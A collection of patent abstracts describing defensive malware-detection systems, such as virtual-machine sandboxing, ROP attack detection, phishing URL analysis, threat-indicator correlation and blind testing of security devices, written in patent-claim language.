Abstract: A method of detecting malware in a specimen of computer content or network traffic is described. The method features conducting a first analysis on the specimen in accordance with a first plurality of analyses and an order of the first plurality of analyses. A second analysis is conducted on the specimen different than the first analysis type. Thereafter, further analyses on the specimen may be altered by modifying information associated with the first plurality of analyses or the order of the first plurality of analyses in response to feedback information based on results from at least the first analysis. The modified information changes a malware analysis of the specimen from being conducted in accordance with the first plurality of analyses to being conducted in accordance with a second plurality of analyses different in analysis type or in order of analyses than the first plurality of analyses.

Abstract: An electronic device comprising one or more processors; a storage medium communicatively coupled to the one or more processors, the storage medium having stored thereon logic that, upon execution by the one or more processors, performs operations comprising: (1) receiving, via a first electrical signal, application data from a mobile agent installed on a mobile device, (2) querying, via a second electrical signal, a database for a risk level of each of one or more applications of the mobile device listed in the application data, and (3) determining a threat level for the mobile device based on one or more of: (i) the risk level of at least one of the one or more applications, (ii) usage information of the at least one of the one or more applications, or (iii) configuration information of the mobile device is shown.

Abstract: A malicious content detection (MCD) system and a computerized method for manipulating time uses two or more time controllers operating within the MCD system in order to capture the behavior of delayed activation malware (time bombs). Each time controller may include a monitoring agent located in a software layer of a computer runtime environment configured to intercept software calls (e.g., API calls or system calls) and/or other time checks that seek to obtain a “current time,” and time-dilation action logic located in a different layer (e.g., a hypervisor layer) configured to respond to the software calls by providing a “false” current time that indicates considerably more time has transpired than the real clock. Additionally, a primary controller may be used in some embodiments to configure and manage, the time controllers.

Abstract: A computerized method to identify potentially malicious code in a network is described. Herein, information associated with a threat is analyzed to yield intelligence that includes instructions or indicators related to the threat. Based on the intelligence, a determination is made as to an endpoint device, which includes an endpoint agent, is to (i) receive at least one of the instructions or the indicators, (ii) conduct an examination of memory of the endpoint device for data corresponding to any of the instructions or the indicators, and (iii) obtain results of the examination. Verification information, including at least a portion of the results of the examination by the endpoint device and an identifier for the endpoint device, is gathered and correlated to determine whether such information corresponds to a verified threat. Thereafter, a notification, including a portion of the verification information, is sent to identify the verified threat.

Abstract: A system featuring a cloud-based malware detection system for analyzing an object to determine whether the object is associated with a cyber-attack. Herein, subscription review service comprises a data store storing subscription information. The subscription information includes identifier for the customer and one or more identifiers each associated with a corresponding customer submitter operable to submit an object to the cloud-based malware detection system for analysis. The first customer submitter receives credentials provided by the subscription review service to establish communications with the cloud-based malware detection system.

Abstract: A scalable, threat detection system features computing nodes including a first computing node and a second computing node operating as a cluster. Each computing node features an analysis coordinator and an object analyzer. The analysis coordinator is configured to conduct an analysis of metadata associated with a suspicious object that is to be analyzed for malware, where the metadata being received from a remotely located network device and to store a portion of the metadata within a data store. The object analyzer is configured to retrieve the portion of the metadata from the data store, monitor a duration of retention of the metadata in the data store, and determine whether a timeout event has occurred for the object associated with the metadata based on retention of the metadata within the data store that exceeds a timeout value included as part of the metadata associated with the suspicious object for malware.

Abstract: According to one embodiment, a computerized method comprises processing one or more objects by a first thread of execution that are part of a multi-thread process, monitoring events that occur during the processing of the one or more objects by the first thread, and storing information associated with the monitored events within an event log. The stored information comprises at least an identifier of the first thread to maintain an association between the monitored events and the first thread. Subsequently, the stored information within the event log is accessed for rendering a graphical display of the monitored events detected during processing of the one or more objects by the first thread on a display screen.

Abstract: According to one embodiment, a virtualized malware detection system is integrated with a virtual machine host including a plurality of virtual machines and a security virtual machine. Logic within the virtual machines are configured to perform a dynamic analysis of an object and monitor for the occurrence of a triggering event. Upon detection of a triggering event within a virtual machine, the logic within the virtual machine provides the security virtual machine with information associated with the triggering event for further analysis. Based on the further analysis, the object may then be classified as “non-malicious,” or “malicious.

Abstract: A malware detection system configured to detect suspiciousness in obfuscated content. A multi-stage static detection logic is utilized to detect obfuscation, make the obfuscated content accessible, identify suspiciousness in the accessible content and filter non-suspicious non-obfuscated content from further analysis. The multi-stage static detection logic includes a controller, a de-constructor, and a post-processor. The controller is configured to receive content while the de-constructor configured to receive content from the controller and deconstruct the content using the analysis technique selected by the controller. The post-processor is configured to receive the de-constructed content from the de-constructor, determine whether a specimen within the de-constructed content is suspicious, and remove non-suspicious content from further analysis.

Abstract: A computing device features one or more hardware processors and a memory that is coupled to the one or more processors. The memory comprises software that supports virtualization, including a virtual machine operating in the guest mode and a virtualization layer operating in the host mode. The virtual machine is configured to execute a plurality of processes including a guest agent process. The virtualization layer is configured to protect the guest agent process operating within the virtual machine that provides metadata to the virtualization layer by restricting page permissions for memory pages associated with the guest agent process when the guest agent process is inactive.

Abstract: A method for detecting a cyber-attack by performing a first analysis on content within a first portion of a communication to determine whether the content includes a first high quality indicator. The first high quality indicator identifies a correlation of the content with a malicious activity. Subsequent to the first analysis, performing a second analysis on a second portion of the communication to determine one or more supplemental indicators. Thereafter, the communication is classified as part of a cyber-attack when (i) a value associated with the first high quality indicator exceeds a first threshold without consideration of the one or more supplemental indicators, or (ii) upon failing to exceed the first threshold and being greater than a second threshold, using the values representing the one or more supplemental indicators with the first value to classify the communication as being part of the cyber-attack.

Abstract: A method for detecting a ROP attack comprising processing of an object within a virtual machine managed by a virtual machine monitor (VMM), intercepting an attempted execution by the object of an instruction, the instruction stored on a page in memory that is accessed by the virtual machine, responsive to determining the page includes instructions corresponding to one of a predefined set of function calls, (i) inserting a first transition event into the memory at a starting address location of a function call, and (ii) setting a permission of the page to be execute only, and responsive to triggering the first transition event, halting, by the VMM, the processing of the object and analyzing, by logic within the VMM, content of last branch records associated with the virtual machine to determine whether the processing of the object displays characteristics of a ROP attack is shown.

Abstract: A system is provided with one or more virtual machines and a replayer. The virtual machine(s) are configured to mimic operations of a first device. The replayer is configured to mimic operations of a second device. Herein, the replayer receives a portion of network data under analysis, dynamically modifies the portion of the network data, and transmits the modified portion of the network data to at least one virtual machine of the one or more virtual machines in accordance with a protocol sequence utilized between the first device and the second device.

Abstract: Disclosed is a cyber-security system that is configured to aggregate and unify data from multiple components and platforms on a network. The system allows security administrators can to design and implement a workflow of device-actions taken by security individuals in response to a security incident. Based on the nature of a particular threat, the cyber-security system may initiate an action plan that is tailored to the security operations center and their operating procedures to protect potentially impacted components and network resources.

Abstract: A submission process for a malware detection system including one or more sensors and a cluster including one or more computing nodes is described. The process includes the sensor that determines whether a prior malware analysis has been conducted on any previously submitted object matching the object under analysis. If not, the process determines whether the object is suspicious, namely a first probability of the first object being associated with malware. If suspicious, metadata associated with the suspicious object is sent to an analysis coordinator of a first computing node of the cluster. The metadata is used in determining whether a prior malware analysis has been previously conducted within the cluster on any object that matches the suspicious object. The metadata is also used in fetching, by an object analyzer of the same or a different computing node of the cluster, the suspicious object from the sensor for malware analysis.

Abstract: A method for detecting a cyber-attack is described. The method features (i) collecting a first plurality of weak indicators, (ii) grouping a second plurality of weak indicators from the first plurality of weak indicators where the second plurality of weak indicators being lesser in number than the first plurality of weak indicators, and (iii) performing a correlation operation between the second plurality of weak indicators and one or more patterns or sequences of indicators associated with known malware. A weak indicator of the first plurality of weak indicators corresponds to data that, by itself, is not definitive as to whether the data is associated with a cyber-attack being conducted on a source of the weak indicator.

Abstract: A non-transitory computer readable storage medium having stored thereon instructions when executable by a processor perform operations including responsive to receiving an email including a URL, conducting an analysis of the email including: (i) analyzing a header and a body, and (ii) analyzing the URL; analyzing contents of a web page directed to by the URL; generating a score indicating a level of confidence the email is associated with a phishing attack based on at least one of the analysis of the email or the analysis of the contents of the web page; and responsive to the score being below a threshold, virtually processing the web page to determine whether the web page is associated with the phishing attack is shown.

Abstract: Sensor enrollment management is conducted where features and capabilities for one or more broker computing nodes within the cluster are received by an enrollment service operating within a management system. The enrollment service is configured to receive advertised features and capabilities for computing nodes that are part of a cluster and provide address information associated with the enrollment service to the sensor. Based on information supplied by the sensor, the enrollment service authenticates the sensor, and upon authentication, forwards keying material associated with the sensor to a computing node selected that is selected for supporting communications to the cluster from the sensor. Also, the enrollment service provides a portion of the advertised features and capabilities associated with the computing node to the sensor to enable the sensor to establish a secure communication path with the computing node for malware analysis of suspicious objects within network traffic monitored by the sensor.

Abstract: The embodiments herein are directed to a technique for providing secure communication between nodes of a network environment or within a node of the network using a verified virtual trusted platform module (TPM) of each node. The verified virtual TPM illustratively emulates a hardware TPM device to provide software key management of cryptographic keys used to provide the secure communication over a computer network of the network environment. Illustratively, the verified virtual TPM is configured to enforce a security policy of a trusted code base (TCB) that includes the virtual TPM. Trustedness denotes a predetermined level of confidence that the security property is demonstrated by the verified virtual TPM. The predetermined level of confidence is based on an assurance (i.e., grounds) that the verified virtual TPM demonstrates the security property.

Abstract: A testing technique tests and compares malware detection capabilities of network security devices, such as those commercially available from a variety of cyber-security vendors. Testing is conducted on test samples in a “blind” fashion, where the security devices do not know beforehand whether the test samples are “live” malware or benign network traffic. The test samples are received from a remote server and potentially represent malicious attacks against a testing network. Notably, for truly blind testing, embodiments of the testing technique employ a mixture of malware and benign test samples, as well as addressing subterfuge, to prevent the security devices from being able to reliably determine maliciousness of the test samples based on a source of any of the samples.